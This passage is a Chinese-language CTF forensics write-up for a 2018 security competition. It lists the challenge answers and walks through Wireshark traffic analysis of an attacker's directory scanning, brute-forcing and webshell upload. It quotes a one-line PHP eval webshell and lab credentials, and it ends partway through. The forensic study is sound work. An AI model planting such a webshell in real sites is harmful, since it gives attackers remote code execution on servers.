之前参加了2018信息安全铁人三项第五赛区比赛,虽然成绩不错,但是自己在做题的过程中遇到的问题还是没有解决好,看看别人的wp学习一下。
首先是题目 1.网站后台密码多少 admin aabbcc 第二个数据包中,登录操作的最后一个 2.攻击者ip是多少 202.1.1.2 3.网站后台登录地址是多少 http://202.1.1.1/ad_admin.php?mod=homepage&loginprompt=wronguserinfo 4.后台写入webshell内容是什么 <?php eval($_POST['cmd']);> 5.网站数据库密码是多少 root newnrtpassword 6.黑客第一个上传的php文件名什么 scan.php 7.黑客对内网扫描的范围是多少 192.168.2.1-192.168.2.150 8.黑客下载的数据库备份文件名是什么 bak_2018-01-29-17-47-52.zip 9.黑客上传的图片木马的密码是多少 10.黑客修改了哪个文件来配合木马文件 favicon.ico obj_edit.php 11.FTP服务器开在了哪个端口 1433 12.黑客使用FTP上传的文件名 13.黑客登录FTP的密码是多少 qweasd123!@# 14.黑客使用FTP上传的文件中的文件内容是什么 CVE-2017-8570
打开第一个数据包,可以发现有大量的404 response code,可知黑客进行了目录扫描,结合题目和数据包,黑客在扫后台登陆的网站地址。 数据包下滑发现,404消失,其次是大量的post请求。再结合数据包分析,过滤POST请求,可知黑客发现登陆后台网址ad_admin.php,接着对用户名和密码进行了爆破。
第一个数据包翻完,还是没看到爆破终止的痕迹。 通过分析,我们知道了在第一个数据包中,黑客的攻击ip:202.1.1.2,服务器ip:192.168.1.203,并且黑客虽然找到了后台登陆的网址(http://192.168.1.203/ad_admin.php),但并未成功爆破用户名和密码。关卡02和关卡03答案呼之欲出,关卡01答案需要剩余的流量包查找。 打开第二个数据包,接着过滤POST请求,观察下,发现末尾第1042820的分组后,黑客没有再继续爆破,但这里还不能确定是否爆破成功。
第三个数据包,打开,依照题目,写入的webshell需要通过POST提交,过滤下。
过滤语句:http.request.method==POST && ip.addr==202.1.1.2
过滤后的第一个数据包就有彩蛋
可知黑客把"<?php eval($_POST['cmd']);?>"写入了shell2.php里,即webshell的内容,关卡04搞定
